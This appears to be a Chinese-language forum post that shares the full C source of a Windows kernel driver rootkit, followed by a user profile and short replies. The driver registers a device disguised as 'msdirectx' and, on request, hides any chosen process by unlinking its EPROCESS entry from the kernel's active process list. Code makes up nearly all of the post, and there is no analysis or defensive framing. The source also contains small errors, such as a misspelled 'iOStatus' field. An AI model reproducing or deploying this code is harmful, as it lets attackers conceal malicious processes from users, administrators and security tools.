- UID
- 39467
注册时间2007-12-3
阅读权限10
最后登录1970-1-1
周游历练
TA的每日心情 | 慵懒
2020-9-27 20:02 |
|---|
签到天数: 7 天 [LV.3]偶尔看看II
|
- #include "ntddk.h"
- #include "stdio.h"
- #include "stdlib.h"
- typedef BOOLEAN BOOL;
- typedef unsigned long DWORD;
- typedef DWORD * PDWORD;
- #define FILE_DEVICE_ROOTKIT 0x00002a7b
- #define IOCTL_ROOTKIT_INIT (ULONG) CTL_CODE(FILE_DEVICE_ROOTKIT, 0x01, METHOD_BUFFERED, FILE_WRITE_ACCESS)
- #define IOCTL_ROOTKIT_HIDEME (ULONG) CTL_CODE(FILE_DEVICE_ROOTKIT, 0x02, METHOD_BUFFERED, FILE_WRITE_ACCESS)
- int FLINKOFFSET;
- int PIDOFFSET;
- PDEVICE_OBJECT g_RootkitDevice;
- const WCHAR deviceLinkBuffer[] = L"\\DosDevices\\msdirectx";
- const WCHAR deviceNameBuffer[] = L"\\Device\\msdirectx";
- #define DebugPrint DbgPrint
- DWORD FindProcessEPROC(int);
- NTSTATUS RootkitDispatch(IN PDEVICE_OBJECT, IN PIRP);
- NTSTATUS RootkitUnload(IN PDRIVER_OBJECT);
- NTSTATUS RootkitDeviceControl(IN PFILE_OBJECT, IN BOOLEAN, IN PVOID,
- IN ULONG, OUT PVOID, IN ULONG, IN ULONG,
- OUT PIO_STATUS_BLOCK, IN PDEVICE_OBJECT
- );
- NTSTATUS DriverEntry(
- IN PDRIVER_OBJECT DriverObject,
- IN PUNICODE_STRING RegistryPath
- )
- {
- NTSTATUS ntStatus;
- UNICODE_STRING deviceNameUnicodeString;
- UNICODE_STRING deviceLinkUnicodeString;
- RtlInitUnicodeString (&deviceNameUnicodeString,
- deviceNameBuffer );
- RtlInitUnicodeString (&deviceLinkUnicodeString,
- deviceLinkBuffer );
- ntStatus = IoCreateDevice ( DriverObject,
- 0, // For driver extension
- &deviceNameUnicodeString,
- FILE_DEVICE_ROOTKIT,
- 0,
- TRUE,
- &g_RootkitDevice );
- if( NT_SUCCESS(ntStatus)) {
- ntStatus = IoCreateSymbolicLink (&deviceLinkUnicodeString,
- &deviceNameUnicodeString );
- DriverObject->MajorFunction[IRP_MJ_SHUTDOWN] =
- DriverObject->MajorFunction[IRP_MJ_CREATE] =
- DriverObject->MajorFunction[IRP_MJ_CLOSE] =
- DriverObject->MajorFunction[IRP_MJ_DEVICE_CONTROL] = RootkitDispatch;
- DriverObject->DriverUnload = RootkitUnload;
- }
- else
- {
- DebugPrint(("Failed to create device!\n"));
- return ntStatus;
- }
- return STATUS_SUCCESS;
- }
- NTSTATUS RootkitUnload(IN PDRIVER_OBJECT DriverObject)
- {
- UNICODE_STRING deviceLinkUnicodeString;
- PDEVICE_OBJECT p_NextObj;
- p_NextObj = DriverObject->DeviceObject;
- if (p_NextObj != NULL)
- {
- RtlInitUnicodeString( &deviceLinkUnicodeString, deviceLinkBuffer );
- IoDeleteSymbolicLink( &deviceLinkUnicodeString );
- IoDeleteDevice( DriverObject->DeviceObject );
- return STATUS_SUCCESS;
- }
- return STATUS_SUCCESS;
- }
- NTSTATUS
- RootkitDispatch(
- IN PDEVICE_OBJECT DeviceObject,
- IN PIRP Irp
- )
- {
- PIO_STACK_LOCATION irpStack;
- PVOID inputBuffer;
- PVOID outputBuffer;
- ULONG inputBufferLength;
- ULONG outputBufferLength;
- ULONG ioControlCode;
- NTSTATUS ntstatus;
- ntstatus = Irp->iOStatus.Status = STATUS_SUCCESS;
- Irp->IoStatus.Information = 0;
- irpStack = IoGetCurrentIrpStackLocation (Irp);
- inputBuffer = Irp->AssociatedIrp.SystemBuffer;
- inputBufferLength = irpStack->Parameters.DeviceIoControl.InputBufferLength;
- outputBuffer = Irp->AssociatedIrp.SystemBuffer;
- outputBufferLength = irpStack->Parameters.DeviceIoControl.OutputBufferLength;
- ioControlCode = irpStack->Parameters.DeviceIoControl.IoControlCode;
- switch (irpStack->MajorFunction) {
- case IRP_MJ_CREATE:
- break;
- case IRP_MJ_SHUTDOWN:
- break;
- case IRP_MJ_CLOSE:
- break;
- case IRP_MJ_DEVICE_CONTROL:
- ntstatus = RootkitDeviceControl( irpStack->FileObject, TRUE,
- inputBuffer, inputBufferLength,
- outputBuffer, outputBufferLength,
- ioControlCode, &Irp->IoStatus, DeviceObject );
- break;
- }
- IoCompleteRequest( Irp, IO_NO_INCREMENT );
- return ntstatus;
- }
- NTSTATUS
- RootkitDeviceControl(
- IN PFILE_OBJECT FileObject,
- IN BOOLEAN Wait,
- IN PVOID InputBuffer,
- IN ULONG InputBufferLength,
- OUT PVOID OutputBuffer,
- IN ULONG OutputBufferLength,
- IN ULONG IoControlCode,
- OUT PIO_STATUS_BLOCK IoStatus,
- IN PDEVICE_OBJECT DeviceObject
- )
- {
- NTSTATUS ntStatus;
- UNICODE_STRING deviceLinkUnicodeString;
- int find_PID = 0;
- DWORD eproc = 0x00000000;
- DWORD start_eproc= 0x00000000;
- PLIST_ENTRY plist_active_procs = NULL;
- IoStatus->Status = STATUS_SUCCESS;
- IoStatus->Information = 0;
- switch ( IoControlCode )
- {
- case IOCTL_ROOTKIT_INIT:
- if ((InputBufferLength < sizeof(int) * 8) || (InputBuffer == NULL))
- {
- IoStatus->Status = STATUS_INVALID_BUFFER_SIZE;
- break;
- }
- PIDOFFSET = (int) (*(int *)InputBuffer);
- FLINKOFFSET = (int) (*((int *)InputBuffer+1));
- break;
- case IOCTL_ROOTKIT_HIDEME:
- if ((InputBufferLength < sizeof(DWORD)) || (InputBuffer == NULL))
- {
- IoStatus->Status = STATUS_INVALID_BUFFER_SIZE;
- break;
- }
- find_PID = *((DWORD *)InputBuffer);
- if (find_PID == 0x00000000)
- {
- IoStatus->Status = STATUS_INVALID_PARAMETER;
- break;
- }
- eproc = FindProcessEPROC(find_PID);
- if (eproc == 0x00000000)
- {
- IoStatus->Status = STATUS_INVALID_PARAMETER;
- break;
- }
- plist_active_procs = (LIST_ENTRY *) (eproc+FLINKOFFSET);
- *((DWORD *)plist_active_procs->Blink) = (DWORD) plist_active_procs->Flink;
- *((DWORD *)plist_active_procs->Flink+1) = (DWORD) plist_active_procs->Blink;
- break;
- default:
- IoStatus->Status = STATUS_INVALID_DEVICE_REQUEST;
- break;
- }
- return IoStatus->Status;
- }
- DWORD FindProcessEPROC (int terminate_PID)
- {
- DWORD eproc = 0x00000000;
- int current_PID = 0;
- int start_PID = 0;
- int i_count = 0;
- PLIST_ENTRY plist_active_procs;
- if (terminate_PID == 0)
- return terminate_PID;
- eproc = (DWORD) PsGetCurrentProcess();
- start_PID = *((DWORD*)(eproc+PIDOFFSET));
- current_PID = start_PID;
- while(1)
- {
- if(terminate_PID == current_PID)
- return eproc;
- else if((i_count >= 1) && (start_PID == current_PID))
- {
- return 0x00000000;
- }
- else {
- plist_active_procs = (LIST_ENTRY *) (eproc+FLINKOFFSET);
- eproc = (DWORD) plist_active_procs->Flink;
- eproc = eproc - FLINKOFFSET;
- current_PID = *((int *)(eproc+PIDOFFSET));
- i_count++;
- }
- }
- }
|
本帖子中包含更多资源
您需要 登录 才可以下载或查看,没有账号?加入我们
x
评分
-
查看全部评分
|
[复制链接]
IP卡
发表于 2012-3-29 02:48:47
提升卡
置顶卡
变色卡
千斤顶
显身卡
发表于 2012-3-30 11:22:01
发表于 2012-3-31 11:15:53
发表于 2012-4-2 11:59:39
